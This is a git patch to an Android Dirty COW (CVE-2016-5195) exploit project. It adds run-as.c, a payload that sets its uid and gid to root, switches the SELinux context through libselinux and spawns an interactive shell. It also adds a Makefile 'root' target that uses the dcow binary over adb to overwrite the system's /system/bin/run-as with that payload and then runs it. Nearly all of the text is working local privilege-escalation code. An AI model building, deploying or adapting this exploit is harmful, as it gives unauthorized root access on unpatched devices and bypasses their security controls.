From cfd2ff4a9a9373f33c1c77efdaa80f2584599874 Mon Sep 17 00:00:00 2001
From: Tim <timrlw@gmail.com>
Date: Mon, 19 Dec 2016 03:26:53 +0800
Subject: [PATCH] setcon shell

---
 Android.mk | 12 +++++++++
 Makefile   |  7 +++++-
 dcow.c     | 13 ++++++++--
 dirtycow.c | 17 +++++++------
 run-as.c   | 71 ++++++++++++++++++++++++++++++++++++++++++++++++++++++
 5 files changed, 109 insertions(+), 11 deletions(-)
 create mode 100644 run-as.c

diff --git a/Android.mk b/Android.mk
index a33a38e..dd8eaf2 100644
--- a/Android.mk
+++ b/Android.mk
@@ -14,3 +14,15 @@ LOCAL_LDFLAGS   += -fPIE -pie
 
 include $(BUILD_EXECUTABLE)
 
+include $(CLEAR_VARS)
+LOCAL_MODULE := run-as
+LOCAL_SRC_FILES := \
+	dirtycow.c \
+	run-as.c
+LOCAL_CFLAGS += -DDEBUG
+LOCAL_CFLAGS    += -fPIE
+LOCAL_LDFLAGS   += -fPIE -pie
+LOCAL_LDFLAGS   += -llog
+
+include $(BUILD_EXECUTABLE)
+
diff --git a/Makefile b/Makefile
index a309613..9e40a48 100644
--- a/Makefile
+++ b/Makefile
@@ -8,9 +8,9 @@ build:
 
 push: build
 	adb push libs/$(ARCH)/dirtycow /data/local/tmp/dcow
-	adb push test.sh /data/local/tmp/test.sh
 
 test: push
+	adb push test.sh /data/local/tmp/test.sh
 	adb shell 'chmod 777 /data/local/tmp/dcow'
 	adb shell 'chmod 777 /data/local/tmp/test.sh'
 	adb shell '/data/local/tmp/test.sh'
@@ -18,6 +18,11 @@ test: push
 	adb shell 'cat /data/local/tmp/test2'
 	adb shell 'cat /data/local/tmp/test2' | xxd
 
+root: push
+	adb push libs/$(ARCH)/run-as /data/local/tmp/run-as
+	adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
+	adb shell /system/bin/run-as
+
 clean:
 	rm -rf libs
 	rm -rf obj
diff --git a/dcow.c b/dcow.c
index dc54f2c..8e9b535 100644
--- a/dcow.c
+++ b/dcow.c
@@ -12,9 +12,18 @@
 #include <sys/wait.h>
 #include <sys/types.h>
 
-extern int dcow(int argc, char *argv[]);
+#ifdef DEBUG
+#include <android/log.h>
+#define LOGV(...) { __android_log_print(ANDROID_LOG_INFO, "exploit", __VA_ARGS__); printf(__VA_ARGS__); printf("\n"); fflush(stdout); }
+#elif PRINT
+#define LOGV(...) { __android_log_print(ANDROID_LOG_INFO, "exploit", __VA_ARGS__); printf(__VA_ARGS__); printf("\n"); fflush(stdout); }
+#else
+#define LOGV(...)
+#endif
 
-int main(int argc, char *argv[])
+extern int dcow(int argc, const char *argv[]);
+
+int main(int argc, const char *argv[])
 {
 	return dcow(argc, argv);
 }
\ No newline at end of file
diff --git a/dirtycow.c b/dirtycow.c
index 14aa679..ad14c39 100644
--- a/dirtycow.c
+++ b/dirtycow.c
@@ -28,7 +28,7 @@ struct mem_arg  {
 	void *offset;
 	void *patch;
 	off_t patch_size;
-	char *fname;
+	const char *fname;
 	volatile int stop;
 	int success;
 };
@@ -130,16 +130,17 @@ static void exploit(struct mem_arg *mem_arg)
 	LOGV("[*] exploited %p=%lx", (void*)mem_arg->offset, *(unsigned long*)mem_arg->offset);
 }
 
-int dcow(int argc, char *argv[])
+int dcow(int argc, const char * argv[])
 {
 	if (argc < 2) {
-		LOGV("usage %s /default.prop /data/local/tmp/default.prop", argv[0]);
+		LOGV("usage %s /data/local/tmp/default.prop /default.prop", argv[0]);
 		return 0;
 	}
 
-	char * fromfile = argv[1];
-	char * tofile = argv[2];
-	
+	const char * fromfile = argv[1];
+	const char * tofile = argv[2];
+	LOGV("dcow %s %s", fromfile, tofile);
+
 	struct mem_arg mem_arg;
 	struct stat st;
 	struct stat st2;
@@ -150,7 +151,7 @@ int dcow(int argc, char *argv[])
 		return -1;
 	}
 	if (fstat(f,&st) == -1) {
-		LOGV("could not open %s", tofile);
+		LOGV("could not stat %s", tofile);
 		return 1;
 	}
 
@@ -160,7 +161,7 @@ int dcow(int argc, char *argv[])
 		return 2;
 	}
 	if (fstat(f2,&st2) == -1) {
-		LOGV("could not open %s", fromfile);
+		LOGV("could not stat %s", fromfile);
 		return 3;
 	}
 
diff --git a/run-as.c b/run-as.c
new file mode 100644
index 0000000..cb59ab2
--- /dev/null
+++ b/run-as.c
@@ -0,0 +1,71 @@
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <errno.h>
+
+#include <dlfcn.h>
+#include <fcntl.h>
+
+#ifdef DEBUG
+#include <android/log.h>
+#define LOGV(...) { __android_log_print(ANDROID_LOG_INFO, "exploit", __VA_ARGS__); printf(__VA_ARGS__); printf("\n"); fflush(stdout); }
+#elif PRINT
+#define LOGV(...) { __android_log_print(ANDROID_LOG_INFO, "exploit", __VA_ARGS__); printf(__VA_ARGS__); printf("\n"); fflush(stdout); }
+#else
+#define LOGV(...)
+#endif
+
+//reduce binary size
+char __aeabi_unwind_cpp_pr0[0];
+
+typedef int getcon_t(char ** con);
+typedef int setcon_t(const char* con);
+
+extern int dcow(int argc, const char *argv[]);
+
+int main(int argc, const char **argv)
+{
+	LOGV("uid %s %d", argv[0], getuid());
+
+	if (setresgid(0, 0, 0) || setresuid(0, 0, 0)) {
+		LOGV("setresgid/setresuid failed");
+	}
+
+	LOGV("uid %d", getuid());
+
+	dlerror();
+#ifdef __aarch64__
+	void * selinux = dlopen("/system/lib64/libselinux.so", RTLD_LAZY);
+#else
+	void * selinux = dlopen("/system/lib/libselinux.so", RTLD_LAZY);
+#endif
+	if (selinux) {
+		void * getcon = dlsym(selinux, "getcon");
+		const char *error = dlerror();
+		if (error) {
+			LOGV("dlsym error %s", error);
+		} else {
+			getcon_t * getcon_p = (getcon_t*)getcon;
+			char * secontext;
+			int ret = (*getcon_p)(&secontext);
+			LOGV("%d %s", ret, secontext);
+			void * setcon = dlsym(selinux, "setcon");
+			const char *error = dlerror();
+			if (error) {
+				LOGV("dlsym setcon error %s", error);
+			} else {
+				setcon_t * setcon_p = (setcon_t*)setcon;
+				ret = (*setcon_p)("u:r:shell:s0");
+				ret = (*getcon_p)(&secontext);
+				LOGV("context %d %s", ret, secontext);
+			}
+		}
+		dlclose(selinux);
+	} else {
+		LOGV("no selinux?");
+	}
+
+	system("/system/bin/sh -i");
+
+}
\ No newline at end of file